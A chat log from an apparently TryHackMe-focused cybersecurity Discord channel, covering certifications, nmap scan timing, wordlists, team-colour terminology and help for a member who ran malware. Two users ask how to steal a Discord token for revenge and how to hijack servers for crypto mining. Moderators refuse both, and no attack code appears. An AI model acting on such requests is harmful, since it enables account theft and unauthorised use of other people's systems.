Boing
#general
silver sky
sick lance
uncut cove
βTryhackmeβ
tries to hack him
sick lance
We're ethical hackers in here.
buoyant tree
eh maths is a big education industry
sage cedar
We're ethical hackers in here.
AIIT
rapid merlin
Does anyone know how to steal a discord token, or some other way besides sending the victim a file and having him download it?
sick lance
Does anyone know how to steal a discord token, or some other way besides sending...
Why on earth would you like to do something illegal? π
sage cedar
lol
rapid merlin
I really need to take revenge on one vile person
uncut cove
Why on earth would you like to do something illegal? π
to go to jail of course
sick lance
I really need to take revenge on one vile person
Two wrongs don't make a right my friend.
rapid merlin
he is engaged in discrimination and provocation of people on the server
sand trench
only good ethical hacking
rapid merlin
Report him?
sick lance
Then you report it to your local authorities and Discord support.
sand trench
and this discord is focused about the website https://tryhackme.com
rapid merlin
Boing
sick lance
he is engaged in discrimination and provocation of people on the server
Vigilante hacking isn't legal, nor is welcome in this server.
rapid merlin
Well, I really need to get its token, I looked everything up on github
thorny walrus
You really dont need to get it
you want it
what you really need is a lesson on ethics
sick lance
Well, I really need to get its token, I looked everything up on github
Are you sure this is the course of action you wish to take?
thorny walrus
what is your server for then?
ethical hacking
rapid merlin
what is your server for then?
its for cyber security not hacking ppl
rapid merlin
Are you sure this is the course of action you wish to take?
yeah
sand trench
go go power scrubz
rapid merlin
I'll go look for the hacker discord
theres no hackers discord
ur just wasting ur time
thorny walrus
Oh no someone is provoking me I must commit the illegal π
rapid merlin
Oh no someone is provoking me I must commit the illegal π
i was that dumb but now nah
uncut cove
theres no hackers discord
only minecraft
thorny walrus
i was that dumb but now nah
I got mad and that was about how far it went
sick lance
Ok guys, it's being dealt with. π
sand trench
let the moderators/scrubz handle it
slate forum
Take it easy
rapid merlin
only minecraft
just some scriptkiddos
sick lance
let the moderators/scrubz handle it
Yup, still feels strange to me too, dw, lol
thorny walrus
just some scriptkiddos
Only real pros use wurst client
sand trench
you are doing fine scrubz
slate forum
I guess that's the solution π
rapid merlin
best one ever
sand trench
yes
how to port colourscheme from .Xresources to all apps supported by other colour schemes???
grizzled wing
i enjoy Kali's new wallpapers
grizzled wing
bummer
primal python
Hi
grizzled wing
sample of 1 of each, try everything
crude stump
sample of 1 of each, try everything
I have
I would show the error but Iβm not at my computer at the moment
grizzled wing
haha, i was just being funny with username
crude stump
Oh lmao
grizzled wing
waiting for Kali to finish upgrading
sand trench
@sick lance
grizzled wing
hi shadow
sand trench
ello veggies
sick lance
If you wish to post jobs on TryHackMe, can you please ping @umbral bay for the process please. π
grizzled wing
scrubz is blue, cool
sick lance
There is steps to take to be allowed to post to the #jobs-board
sick lance
scrubz is blue, cool
grizzled wing
haha
sick lance
That song will now be stuck in your head all day.
You're welcome!
grizzled wing
π πͺ±
sand trench
*reminds shadow of the tumblr post about a race of telepathic aliens that loves having humans around as you can ask them to think about a popular song and due to ear worms the humans will "play" that song for the aliens
grizzled wing
what benefit is there for the aliens to have human play a specific song?
social engineering example?
sand trench
when bored and wanna listen to music make human think of song and just listen to their thoughts
grizzled wing
okay
grizzled wing
make some hashes then hash or john crack them
sick lance
somebody recommend something fun to do
The new room.
grizzled wing
find a password in rockyou
buoyant tree
make some hashes then hash or john crack them
thats a heater
sand trench
somebody recommend something fun to do
try to memorise all the passwords in order from rockyou.txt
buoyant tree
The new room.
there's a new room today?
grizzled wing
hacksmarter room, medium level
sand trench
yeah probably more sane to do this new room
grizzled wing
yesterday was Pi day
sand trench
https://tenor.com/view/speechless-no-comment-okay-jason-bateman-gif-13712743
it is easy.. it is just 14 million lines or so
past sparrow
try to memorise all the passwords in order from rockyou.txt
shuffle the list and re-arrange them manually
loud marlin
if you cat them will be faster to list them and learn
grizzled wing
another option is to find the emails in rockyou, there are a few
past sparrow
back as it was
verbal musk
does any anyone have any advice for me
sick lance
does any anyone have any advice for me
Download Malware-bytes.
past sparrow
that re-arrangement game would be like a puzzle with 14.3 million pieces
plenty to do for hours, a lot of them, you won't be bored!
sick lance
Run a scan, see what it picks up.
past sparrow
does any anyone have any advice for me
Run defender scan
verbal musk
yeah I did that also used avast
sick lance
So why do you think you were hacked?
verbal musk
I'm just worried about my information being out there
verbal musk
So why do you think you were hacked?
I downloaded malware off this guy claiming to want people to test out this game
I know im pretty not smart
sick lance
I wouldn't say that.
simple valve
I get those shady discord DMs all the time
sick lance
I've seen people who are knowledgable in this field get caught out.
simple valve
Almost downloaded one too π
chilly veldt
Morning
past sparrow
Morning
devout palm
What is love
verbal musk
don't hurt me
past sparrow
I've seen people who are knowledgable in this field get caught out.
Makes me actually wonder how it's socially perceived, are knowledgeable people more likely or less likely to notify in a company environment that they are infected, or do they try to hide their stupid activity more because of embarrassment
verbal musk
idk is there anything I can do once they get all my personal info??
past sparrow
idk is there anything I can do once they get all my personal info??
Well - what can they do with your personal info?
whole moss
Also what info you got? Bank, creditcard? If those then call the bank asap
sick lance
Really, if they already have info, nothing.
However it's hard to say what the malware actually done without diving in to it.
sand trench
Well - what can they do with your personal info?
*don't answer that shadow don't answer that shadow don't answer that shadow don't answer that shadow don't answer that shadow *
verbal musk
Also what info you got? Bank, creditcard? If those then call the bank asap
thank god I don't have any of that on my computer
twin ridgeBOT
Gave +1 Rep to @whole moss (current: #475 - 9)
past sparrow
*don't answer that shadow don't answer that shadow don't answer that shadow don'...
I mean its very region dependent and also what information actually was aquired, depending on severity, a lot of bad could be done
But also could be that nothing could be done
verbal musk
I did have tax information saved on my computer
I'm hoping they didn't get to it tho
past sparrow
Did you run the malware with administrator privileges? Was the software actively running that contained tax information?
verbal musk
no
the tax file was a pdf
I think they only got my password info but alot of it is outdated
past sparrow
Oh. do you still have this software somewhere available that they sent you?
sick lance
Probably best deleting the message so you don't click it again.
verbal musk
definitely
past sparrow
yea they linked me a site to it
Can you send me the link in defanged form in DMs?
sick lance
Let's not ask members for malware.
verbal musk
the site itself seemed harmless
it was the downlaod on that site which was the malware lol
but yeah its cool I feel better
I don't think they hit anything that devestating
past sparrow
Best you can do now is report their domain for malicious activity, threat intelligence feeds will pick it up and may protect someone
verbal musk
Best you can do now is report their domain for malicious activity, threat intell...
how do I do that?
like on discord
oh the site link?
past sparrow
Yeah, the website you downloaded it from
verbal musk
thanks for the advice everyone here seems pretty chill
sick lance
Which AV do you use?
verbal musk
Which AV do you use?
Its a drawing i made
sick lance
Its a drawing i made
AV = Anti-Virus 
sick lance
Good choice, do you have Malware-bytes premuim?
verbal musk
nope
sick lance
Ah.
Free version is just as good.
sand trench
has to rely on clamav as can't find any other good av for linux
crude stump
question for the snort room it says to run a traffic generator shell. Do i just copy and paste the script into my terminal?
sick lance
question for the snort room it says to run a traffic generator shell. Do i just ...
#room-help please π
crude stump
oh yeah my b
hasty palm
altho complicated to me atm snort seems to be good stuff
past sparrow
clam is actually pretty solid tho
does its job ...
past sparrow
altho complicated to me atm snort seems to be good stuff
it definitely can be
shut hawk
Woah. This is incredible, Discord.
sick lance
That looks quite good
past sparrow
hasty palm
π
sand trench
shadow annoyed that discord does not support colourschemes like dracula or catppuccin or nord or rosepine
wild rose
psychopaths everywhere you go
sick lance
Let's not do a Muiri
molten sky
why are you guys like this
sick lance
I like chaos.
molten sky
fair i guess
rapid merlin
Woah. This is incredible, Discord.
is that new or smth?
shut hawk
is that new or smth?
Yeah, Right click a user -> Mod view
cc @mossy river cool new discord feature
past sparrow
why are you guys like this
At first it was just to get reaction out of people, never fails, but now, I have started to like it
molten sky
it's kinda funny tbh
sick lance
Oh mate
molten sky
10 years ago everything was like that
past sparrow
Yeah, I enjoyed the 10 years ago thing
sick lance
Can everybody? lol
sick lance
cc <@270975958511517697> cool new discord feature
Can you do it?
Or only mods?
rapid merlin
Yeah, Right click a user -> `Mod view`
Wow that seems nice, you can see what role granted what permission too
shut hawk
Can you do it?
Or only mods?
Only mod, Mod view
molten sky
is it in an office with bright lights behind it? light mode
rapid merlin
Only mod, `Mod view`
xd
shut hawk
Wow that seems nice, you can see what role granted what permission too
Yeah, a lot of information summed up nicely
sick lance
Only mod, `Mod view`
molten sky
minimize contrast between the screen and backdrop
past sparrow
I am also that kind of guy that has always lights on when behind computer, I don't like to sit in the darkness
hasty palm
late night white sometimes hurts eyes, so dark mode in my case is easier to work with.
molten sky
I am also that kind of guy that has always lights on when behind computer, I don...
in the room yes
but i mean behind the screen
sick lance
Yeah, a *lot* of information summed up nicely
I can't do it to myself.
molten sky
otherwise the contrast gets old
past sparrow
in the room yes
but i mean *behind the screen*
ah yeah, my walls are light
hasty palm
this community is quite nice
rapid merlin
btw Scrubz you cant do it for any role higher than yours right?
past sparrow
late night white sometimes hurts eyes, so dark mode in my case is easier to work...
I find dark to exhaust my eyes faster
sick lance
btw Scrubz you cant do it for any role higher than yours right?
I can do everyone, except me.
rapid merlin
oh wait thats strange
crude stump
do me
crude stump
pause
rapid merlin
it should be the same as editing roles, only the roles below your highest role. (if granted permission)
keen osprey
hello, how do i start my cyber attack
crude stump
wow
keen osprey
i want to be a good black hat
sick lance
molten sky
lmao
rapid merlin
i want to be a good black hat
Do you know what that is?
crude stump
its your time to shine baby
rapid merlin
Dont you mean white hat?
past sparrow
i want to be a good black hat
What is a good black hat?
molten sky
its your time to shine baby
crude stump
ah thank you
twin ridgeBOT
Gave +1 Rep to @sick lance (current: #2 - 2059)
keen osprey
What is a good black hat?
yes
simple valve
What is a good black hat?
Nike has good black hats
crude stump
5k aint bad
past sparrow
π€
past sparrow
Nike has good black hats
I don't really follow the brands
rapid merlin
Nike has good black hats
I like the tommy hilfiger ones
past sparrow
I wear what fits
hasty palm
i want to be good at defense ...blue ?
simple valve
Tommy hilfiger is nice too, their minimalistic styles are amazing
crude stump
that is blue yes
molten sky
not everything is red and blue y'all
past sparrow
best defense is of......
keen osprey
What is a good black hat?
well manner black hat, i mean he can do what he want
molten sky
there are things that are defensive that aren't blue
simple valve
there are things that are defensive that aren't blue
You mean like penetration testing
molten sky
if you're adjusting firewall rules all day that's defensive but it's not blue teaming
crude stump
personally im more of a maroon hat typa guy
past sparrow
well manner black hat, i mean he can do what he want
Sorry mate, I don't think I can help you, I just don't know what you mean
boreal gull
i think it kinda depends on what time period of THM
sick lance
@keen osprey this a community for ethical hacking, we don't teach any black hat material
boreal gull
when there was like 5 people, yes
molten sky
π
rapid merlin
π
devout palm
π
keen osprey
<@597387192561696769> this a community for ethical hacking, we don't teach any b...
yeah i want to be a good ethical hacking
sometimes white hat and black hat optionally attack and defends
crude stump
yeah i want to be a good ethical hacking
then let me tell you somthing. THM is offering a once in a life time oportunity to learn ethical hacking
rapid merlin
sometimes white hat and black hat optionally attack and defends
You should read this: https://www.kaspersky.com/resource-center/definitions/hacker-hat-types
yo
crude stump
sup
past sparrow
if you're adjusting firewall rules all day that's defensive but it's not *blue t...
I am not sure that is a very good example
sick lance
how do i join a machine if it doesnt give me the user and pass
#room-help Please.
boreal gull
sometimes white hat and black hat optionally attack and defends
blackhat means illegal, not that you attack legally!
White hat means you can legally attack and sometimes defend (although blue hat)
past sparrow
Depends what kind of firewall rules are you adjusting, ingress, egress?
rapid merlin
mb
crude stump
oh wait nvm
boreal gull
if you're adjusting firewall rules all day that's defensive but it's not *blue t...
my entire job is adjusting firewall rules π
crude stump
go to room help
boreal gull
its not meant to be
molten sky
Depends what kind of firewall rules are you adjusting, ingress, egress?
not really. blue team is defensive but defensive isn't always blue team
molten sky
a square is a rectangle but a rectangle isn't always a square
devout palm
Is it always DNS?
molten sky
Is it always DNS?
it's ALWAYS dns
simple valve
exact same question
keen osprey
not really. blue team is defensive but defensive isn't always blue team
red team always plant a bomb
past sparrow
not really. blue team is defensive but defensive isn't always blue team
No I mean, if you are interactive with firewalls it could as well be part of blue team obligations, defensive can also be compliance, there you can't convince anyone that this is blue team
rapid merlin
rapid merlin
red team always plant a bomb
A bomb?
molten sky
No I mean, if you are interactive with firewalls it could as well be part of blu...
Unless you are in a role that actively engages with threats then you aren't blue team
rapid merlin
Were not playing call of duty here mate
molten sky
just like how bug bounty hunting is not red team
keen osprey
Were not playing call of duty here mate
sorry
devout palm
simple valve
just like how bug bounty hunting is not red team
Red team operations should change their name
molten sky
it's become a huge misnomer
whole moss
Printing this for my network engineer friend
past sparrow
Unless you are in a role that *actively engages with threats* then you aren't bl...
If your job is to feed IOCs into firewall rules because of bad maintenance then you are doing the grunt blue teaming work
rapid merlin
Red team operations should change their name
And i should start with my school assignment (must be handed in in an hour)
simple valve
Damn
keen osprey
many black hat is more skilled and go jail but the idea was while he got a free ticket to become cybersecurity consultant after served time in jail
molten sky
If your job is to feed IOCs into firewall rules because of bad maintenance then ...
blue team is the direct counterpart to red -- if you're countering a red team, you're a blue team. if you're feeding in IOCs from a third party provider, that's not blue team. if you're feeding in IOCs that you found from your red team, then you can be blue team
crude stump
many black hat is more skilled and go jail but the idea was while he got a free ...
are you thinking of kevin mitnick?
wild rose
didn't he pass this year?
crude stump
yeah
wild rose
rip
past sparrow
blue team is the direct counterpart to red -- if you're countering a red team, y...
Are you saying that you are only doing blue team if you are doing active incident response?
crude stump
many black hat is more skilled and go jail but the idea was while he got a free ...
you dont need to go to jail to become a cybersecurity consultant
molten sky
Are you saying that you are only doing blue team if you are doing active inciden...
blue team is the direct counter part to a red team --- if you have no red team, then you're just a threat hunter or an incident response team or whathaveyou
devout palm
And doing bad things doesn't make you more skilled
simple valve
I think adversary threat emulation is a good alternative name to red teaming
past sparrow
blue team is the direct counter part to a red team --- if you have no red team, ...
But threat hunters, incident response teams are considered blue teams
molten sky
I think adversary threat emulation is a good alternative name to red teaming
red teaming is a fine name imo (and very conventional for other industries too), but a name like that would be much more likely to retain it's meaning over time (unlike red team)
lone thistle
many black hat is more skilled and go jail but the idea was while he got a free ...
ngl, I enjoy a regular, legal salary, without having to look over my shoulder, and jail/prison does not sound fun
molten sky
But threat hunters, incident response teams are considered blue teams
they aren't one tho. it's a misnomer.
just like how companies call bug hunting "penetration testing"
just cause they like the name doesn't mean it's correct
sick lance
many black hat is more skilled and go jail but the idea was while he got a free ...
Probably best changing to topic,
Serving jail time isn't worth it.
crude stump
mans gonna come back to a hundred pings lmao
molten sky
i gots to goes
crude stump
any of yall had boba before
thorny walrus
any of yall had boba before
π
crude stump
made my own but i undercooked em. now there rock hard in the middle lol
thorny walrus
damn
crude stump
like eating a rock
thorny walrus
i love eating rocks
crude stump
but with a squishy exterior
past sparrow
Okay yeah, you are right, looked up the definition @molten sky Apparently term blue team only applies to a mock situations
where there is active engagement
whole moss
Anyone into sff machine? I am planning on building one and I am thinking of going with fractal design terra but still open to other cases
lone thistle
Okay yeah, you are right, looked up the definition <@270629973906161665> Apparen...
idk where that definition is from but I'd very heavily disagree.
Blue teaming encompases a variety of roles, security engineering, SOC analysts, IR, etc. You are as proactive as you are reactive. Any role that is implementing security measures, monitoring, collecting threat intelligence, etc, is safe to consider as "blue teaming"
past sparrow
idk where that definition is from but I'd very heavily disagree.
Blue teaming e...
I got it from NIST
lone thistle
could you link? π
crude stump
whats the difference between icmp and http
lone thistle
i am surprised NIST are putting it like that unless there's some context that i'm missing
keen osprey
whats the difference between icmp and http
icmp is ping http is low standard web ?
past sparrow
Or you can go there from here https://csrc.nist.gov/glossary/term/blue_team
devout palm
whats the difference between icmp and http
Those two are very different
lone thistle
https://www.cnss.gov/CNSS/openDoc.cfm?a=X5d3uc6qiR33Omw%2B5hiKrQ%3D%3D&b=61A89B4...
ah. I think i'm geoblocked
crude stump
Those two are very different
are you fimiliar with snort?
rapid merlin
could you link? π
The group responsible for defending an enterprise's use of information systems by maintaining its security posture against a group of mock attackers (i.e., the Red Team). Typically the Blue Team and its supporters must defend against real or simulated attacks 1) over a significant period of time, 2) in a representative operational context (e.g., as part of an operational exercise), and 3) according to rules established and monitored with the help of a neutral group refereeing the simulation or exercise (i.e., the White Team).
CSRC Content Editor. (n.d.). blue team - Glossary | CSRC. https://csrc.nist.gov/glossary/term/blue_team
hasty palm
all kind of red flags puped up when i kliked that link
devout palm
are you fimiliar with snort?
Nope
rapid merlin
all kind of red flags puped up when i kliked that link
uh?
past sparrow
idk where that definition is from but I'd very heavily disagree.
Blue teaming e...
And I would otherwise heavily agree with you, but as I went just to hunt for confirmation, I stumbled on it
sick lance
idk where that definition is from but I'd very heavily disagree.
Blue teaming e...
Purple teaming if you mix it with an active red team engagement
hasty palm
keen osprey
is there a standard iq for become good ethical hacker?
mossy river
no
devout palm
I mean, why does it matter? lol. Call it whatever you want ~ This is for blue team discussion
mossy river
IQ does not equate to intelligence
lone thistle
Or you can go there from here https://csrc.nist.gov/glossary/term/blue_team
Ahh that is odd. Yeah I do see their definition. For the first time in my life, I disagree with NIST haha. IDK if the definition is old, or is specifically written to have some nuance, but blue teaming isn't just responding to mock incidents / responding to red team efforts. Sure, that's definitely an element, but again, there are roles where you are proactive - monitoring for attacks, incidents, etc, that may be from a legitimate threat and not just a mock scenario
past sparrow
Ahh that is odd. Yeah I do see their definition. For the first time in my life, ...
Yeah, honestly, NIST should update their definitions
I would 100% put IR into Blue Teaming, not just "IR"
along with other supportive roles
floral wing
At the end, they do mention a blue team can exist without a red team so idk y they worded like that in the beginning passage
past sparrow
I mean it makes sense they want to call it based on army terminology, because out in combat you don't also call enemy a red team
lone thistle
yup. Blue teaming has definitely expanded to be a bit more of an umbrella term. Maybe the definiiton there is thinking of it "traditionally", but absolutely a modern definition would include the above roles/responsibilities
devout palm
yup. Blue teaming has definitely expanded to be a bit more of an umbrella term. ...
Agree
past sparrow
that's where the terminology derives from but in IT it has already become de facto terms for goodies and baddies
hasty palm
ai version of blue hat
whole yew
yup. Blue teaming has definitely expanded to be a bit more of an umbrella term. ...
IMO the color teams are 100% marketing bullshit and don't really apply to sane orgs
devout palm
Ya call us baddies, huh?
hasty palm
mossy river
IMO the color teams are 100% marketing bullshit and don't really apply to sane o...
fr
lone thistle
IMO the color teams are 100% marketing bullshit and don't really apply to sane o...
oh yeah 10000%
mossy river
Similar to the hats
rapid merlin
Similar to the hats
Yeah, people get confused with that
whole yew
It's useful way to explain stuff to people without the understanding of what the various roles in cybersecurity are
past sparrow
Ya call us baddies, huh?
I promise both goodies
whole yew
but other than that.... it has no meaning within the industry
past sparrow
but other than that.... it has no meaning within the industry
Other than narrowing down what you do without wanting to explain
floral wing
these terms r just used in the learning phase ig
whole yew
How does that do that, when someone doesn't understand enterprise security
it's just another flavor jargon term
hasty palm
im gonna make some fried eggs
whole yew
but that's not what i do with my security engineer role
"computer policeman" is possibly even more useless unless you actually work as law enforcement and specialize in cybercrime
past sparrow
I guess it also depends how much they care about the details or is it just some general overview
lone thistle
yeah, I mean, in the industry you would expect someone to know what you do based on your role. Oh I'm a soc analyst, etc.
For the non-technical or as a general seperatation, the blue team is like a "oh I stop hackers", red team "I pretend to be a hacker to help organisations". Etc. It's very shallow I think intentionally
whole yew
I just tell people I work in IT
Because unless they also work in IT, whatever else I say is meaningless to them
past sparrow
I have learnt that saying it can be a headache because IT means coming to you with problems like "can you make me a web page"
whole yew
I certainly can help with that
wild rose
you know I just work for one of those ABC agencies. nothing too important.
whole yew
my consulting rate is $350/hr, $250/hr if we're friends
lone thistle
I certainly can help with that
will I? no. LOL
whole yew
that usually puts a stop to that
pay my rate, i don't care if you want me to sweep the floors
i've definitely had consulting customers burn a significant amount of hours have me babysitting an empty cage instead of deploying products
past sparrow
maybe better to say "computer security guard" then
shut hawk
juun, played season 2 of the finals?
devout palm
Better to not talk
whole yew
oh, the password security discussions i have with my family
clear jackal
"I work with computers"
whole yew
"don't use the same email/pass everywhere" "but then i have to remember things!"
umbral bay
maybe better to say "computer security guard" then
Keeping the Internet safe.β’οΈ
clear jackal
And if anyone asks to help me fix stuff, "oh, it's my job to break them"
past sparrow
so you want to go to jail?
simple valve
"don't use the same email/pass everywhere" "but then i have to remember things!"
I introduced them to password managers, particularly, Appleβs one.
whole yew
Yeah, I have done that too. "But now I have to remember another password"
simple valve
Hahahahaha canβt argue with that
umbral bay
so you want to go to jail?
Only if my opponent has all the hotels in Monopoly.
devout palm
Lol
past sparrow
Only if my opponent has all the hotels in Monopoly.
At this point its the cheapest room to sleep in
wild rose
Monopoly... so you have choosen death
simple valve
my consulting rate is $350/hr, $250/hr if we're friends
On one hand, Iβd like to ask how does one become an external IT consultant for others without being tied up to a company?
fresh cobalt
simple valve
Helo
devout palm
"Can you hack x's instagram?"
fresh cobalt
When a room is in network state : resetting , how long does it take roughly ?
keen osprey
is there a way of ethical hacking to manipulate / hack server so they can mining on it
umbral bay
When a room is in network state : resetting , how long does it take roughly ?
About a minute.
simple valve
Only if my opponent has all the hotels in Monopoly.
Hi @umbral bay not sure if this is an appropriate question but what certs does THM recognize in the discord?
devout palm
is there a way of ethical hacking to manipulate / hack server so they can mining...
Is there a way to ethically legally rob a house?
fresh cobalt
Ok Iβm still waiting
sick lance
is there a way of ethical hacking to manipulate / hack server so they can mining...
All you rmessages tonight have not really been really ethical my friend... π
Ok, not all, most.
umbral bay
Hi <@719230703161835633> not sure if this is an appropriate question but what ce...
Which one are you looking for?
sick lance
is there a way of ethical hacking to manipulate / hack server so they can mining...
If you're hacking something, so you can run a mining application on it.
Does that seem ethical?
devout palm
Shh
keen osprey
If you're hacking something, so you can run a mining application on it.
Does th...
yes, i dont rob the server just as a guest
sick lance
yes, i dont rob the server just as a guest
But you're planning on installing something without a users consent and/or knowledge, are you familiar with the "Computer Misuse Act" ?
devout palm
Idk how to send without embeds on mobile
<link>
keen osprey
But you're planning on installing something without a users consent and/or knowl...
no my friend im 16, still looking for career path
umbral bay
This one https://www.apisecuniversity.com/courses/api-security-certified-profess...
We don't have that one.
coarse moth
is there a way of ethical hacking to manipulate / hack server so they can mining...
@mossy river
sick lance
no my friend im 16, still looking for career path
You won't get very far with the current attitude...
crude stump
<@270975958511517697>
Scrubz is on it
simple valve
We don't have that one.
π, what do we have π
umbral bay
π, what do we have π
A crazy amount actually, the usual ones.
simple valve
Planning to take only certs that THM has roles in kek
past sparrow
A crazy amount actually, the usual ones.
Is there any GIAC ones?
sick lance
past sparrow
Oh, can I get GDAT on my profile?
crude stump
Idk can you
past sparrow
Asking the mods/admins
sick lance
I can't assign it yet, you'll need to wait for a mod to come, or tim if he ain't busy.
simple valve
Are SANS just courses and GIAC are their relevant certs?
past sparrow
Are SANS just courses and GIAC are their relevant certs?
Yes
simple valve
I always thought they were separate bodies
sick lance
no my friend im 16, still looking for career path
I think you should have a read over the #rules again, number 4 to be specific.
simple valve
Like GIAC only prefers SANS courses but you can learn from other stuff
keen osprey
I think you should have a read over the <#651923438524432404> again, number 4 t...
ok π sorry sir
past sparrow
Like GIAC only prefers SANS courses but you can learn from other stuff
Nope, GIAC is SANS, you can do the exam without their materials as well but it could be hard
coarse moth
ok π sorry sir
next time you'll be banned
sick lance
next time you'll be banned
π mini-modding are we?
sick lance
next time you'll be banned
mini-modding is not welcome, and it can make situations harder to moderate. π
Please stop.
coarse moth
What is the cloud training section about? Is it included with the subscription?
sick lance
It Is not, due to the expense it's a separate purchase.
fresh cobalt
About a minute.
Something should be wrong then , still resetting. Iβll come back later
lone thistle
Something should be wrong then , still resetting. Iβll come back later
can you tell me an IP address of a machine that you see on the network map in the room? I can look on the backend to see the actual state of the machines
past sparrow
@lone thistle Hey, can I get GDAT role on my profile?
fresh cobalt
The DC has 10.200.64.101
lone thistle
Iβm not a moderator alas, youβll need to wait until one pops in
lone thistle
The DC has 10.200.64.101
Cool cool. Iβll have a look
fresh cobalt
Cool cool. Iβll have a look
Thanks
twin ridgeBOT
Gave +1 Rep to @lone thistle (current: #7 - 827)
crude stump
i cant with this
past sparrow
Oh okay, I will keep waiting till someone pops in then, thanks anyway
lone thistle
Yup:) the people on the right at the top of the server list in green are able to do it ππΌ
They swing by fairly often so
raven moth
hello
i know it's a question that has already been made but when is dark theme coming?
sand trench
i know it's a question that has already been made but when is dark theme coming?
2 months TradeMark
lone thistle
The DC has 10.200.64.101
O.o. I can't even see that machine as existing, neither does anything else on x.64.x. How odd.
Can you leave the room by clicking on the grey cog, leave room, and re-join it after about 10 minutes?
raven moth
2 months TradeMark
what?
raven moth
mhmh i see, thanks
umbral bay
Oh, can I get GDAT on my profile?
Done. π₯³
past sparrow
Done. π₯³
Cheers!
fresh cobalt
O.o. I can't even see that machine as existing, neither does anything else on x....
Ok Iβll do that
serene wren
read books, have notes basically and note cards. Learning from objective based such as certifications and gamified things like Python Scripting from HackerRank. Most books have projects and those are the best ones but anyways just keep looking to obtain things and nonstop grind. Of course your not going to remember everything if your in multiple subjects at once, hence why some people get lower grades than others.
Differnet subjects have differnet techniques of learning, coding is obviously just reading and have logical thinking outside of having calculus in your arsenal.
rapid merlin
anyone here taking the evilginx course, please i'm having issues with gmail
shut hawk
Tried asking in their discord server?
- Flashcards
- Paraphrasing
- Teaching others (or even just speaking out loud)
- Applying what you learnt to a real scenario
blazing granite
Tried asking in their discord server?
apparently π I have an issue with spotify customer services can I ask here π π
crude stump
My speaker is broken. Anyone know the fix
fresh cobalt
Same , sometimes I donβt remember when I put my notes π
chilly veldt
Just be relaxing at work trying to get through the night
grizzled crystal
Honestly the more you use what you study the more likely you are to remember it. I am very bad at memory stuff, so I prefer having a good reference that I can look at whenever I need a refresher
Figure out what works for you and do that
I like notes do I do notes
boreal scarab
loud marlin
i think that madam webb is my no1 dumb ass movie ever
grizzled crystal
i think that madam webb is my no1 dumb ass movie ever
Clearly you have not watched star trek into darkness
I really want to watch madam webb, seems fun in a hatewatch sort of way
loud marlin
Clearly you have not watched star trek into darkness
did... not impressed....
madam webb is movie with nothing of nothing. if i stare intro wall for 2h ill be more mussed =/.
fast inlet
any of you guys still use IRC channels? :P
sand trench
madam webb is movie with nothing of nothing. if i stare intro wall for 2h ill be...
that is how you start halucinating...
loud marlin
even that is more fun =/
sand trench
depending on a few factors yeah it can be fun
loud marlin
true. but movie is 1st class shit... just shit... no action, nothing that will make it worth of watching
fast inlet
is it normal that an nmap scan with all ports ( -p 1-65535 -T4 -A -v ) takes like 3 hours to complete? 
loud marlin
what command exactly?
loud marlin
on thm ?
fast inlet
i mean it found 2 open ports right away but then stuck on SYN Stealth Scan Timing for 1+ hour
45% done after 1 hour and half or so
i guess it's because all ports
loud marlin
there is no scan on thm that need that amount of time. and not sure to what room, but no need to run that long
whole yew
think about how much time it takes to get a response from an open port vs a closed/filtered port. What's the bottleneck? Now multiple that by the number of closed ports.
cerulean nest
anyone know about format strings and how to exploit em?
shoot me a dm
im goin braindead
fast inlet
think about how much time it takes to get a response from an open port vs a clos...
actually i have no clue there lol, does it take much more time to get a response from a close/filtered port? Thought it'd be as fast
cerulean nest
actually i have no clue there lol, does it take much more time to get a response...
no it takes the same amount of time if not 0.1s more
also how tf do yall have different role colord
whole yew
don't give bad information.
cerulean nest
colors
whole yew
Timeout is configurable, default timeout is more than you think. It's not 100ms.
cerulean nest
for me it takes like less than 1s
loud marlin
if port is open then you prob get "instant" respond. for other state of ports you prob need more time. depend of how is set on system
and nmap by default, don't scan UDP ports. if you scan them then it can take ages
fast inlet
then yeah i suppose scanning all 65k takes ages
cerulean nest
why tf would u do that
fast inlet
with default settings anyway
whole yew
If you want an exhaustive check, that's what you have to do. Sometimes CTFs (and sometimes admins) will put services on high unprivileged ports just to make things harder to randomly discover.
cerulean nest
bruh
simple valve
If you want an exhaustive check, that's what you have to do. Sometimes CTFs (and...
security through obscurity
if it works, it works
whole yew
Common offsets are multiple of 8k or 10k, but there is no 'best practice' or RFC that makes recommendations
whole yew
Neither of those ports are valid
cerulean nest
works with some applications
whole yew
65535 is the highest possible port value
cerulean nest
no u can have higher
loud marlin
nop
cerulean nest
autopsy binds to 99999
whole yew
Please link me the RFC
fast inlet
If you want an exhaustive check, that's what you have to do. Sometimes CTFs (and...
how would i change the settings to make an all-ports scan go faster, you'd say?
loud marlin
first think, do you need scann all of them?
whole yew
autopsy binds to 99999
You should recheck that. You are wrong.
whole yew
how would i change the settings to make an all-ports scan go faster, you'd say?
I wouldn't scan all ports until I'd exhausted other options and I was sure there was something I'm not finding. Top ports, increase concurrency, decrease timeout for TCP responses, more aggressive scan profile are all things you can try. Which room is this for?
loud marlin
autopsy binds to 99999
fjodor will go crazy if that is case π
cerulean nest
You should recheck that. You are wrong.
sudo apt install autopsy
then do autopsy
and see what happens
whole yew
`sudo apt install autopsy`
Why would I install it? I just actually checked the official documentation.
cerulean nest
bro im literally using it right now im on port 9999 localhost
loud marlin
9999 is not 99999
whole yew
Yea, 9999, not 99999 as you originally said. 9999 is an allowed port value, 99999 is not.
versed prairie
Does anyone have good wordlist recommandations?
cerulean nest
oh shi im dumb lmao
whole yew
For a specific room, @versed prairie or just in general?
whole yew
oh shi im dumb lmao
It's ok, we all start somewhere. Don't worry about it, just accept the lesson and keep learning π
versed prairie
For the THM Rooms in general
whole yew
Most of the rooms that require a wordlist will tell you which one to use
versed prairie
Most of the rooms that require a wordlist will tell you which one to use
But is there a pack with all of them in it? π
simple valve
Seclists on Github
whole yew
But is there a pack with all of them in it? π
They will also tell where to find the wordlist. Sometimes it's github, sometimes it's a download in the room task.
versed prairie
They will also tell where to find the wordlist. Sometimes it's github, sometimes...
ok thx π
twin ridgeBOT
Gave +1 Rep to @whole yew (current: #10 - 736)
crude stump
ugh i forgot who it was but someone recomended a video that explains ports
forgot who it was sadly
molten sky
ugh i forgot who it was but someone recomended a video that explains ports
i remember this conversation
wasn't me who sent the vid tho
crude stump
ikr
molten sky
Does anyone have good wordlist recommandations?
very situational too
crude stump
i remember it off the top of my head
molten sky
like i have wordlists half a TB in size that I multiply with permutations
crude stump
maybe they will speak and i will remember them
molten sky
you're not gonna want that for most things
not gonna use rockyou for directory fuzzing
many people make their own as well for certain targets
was it this one @crude stump
molten sky
nothing special lol searched for "ports" in messages sent by you than just scrolled down a bit
molten sky
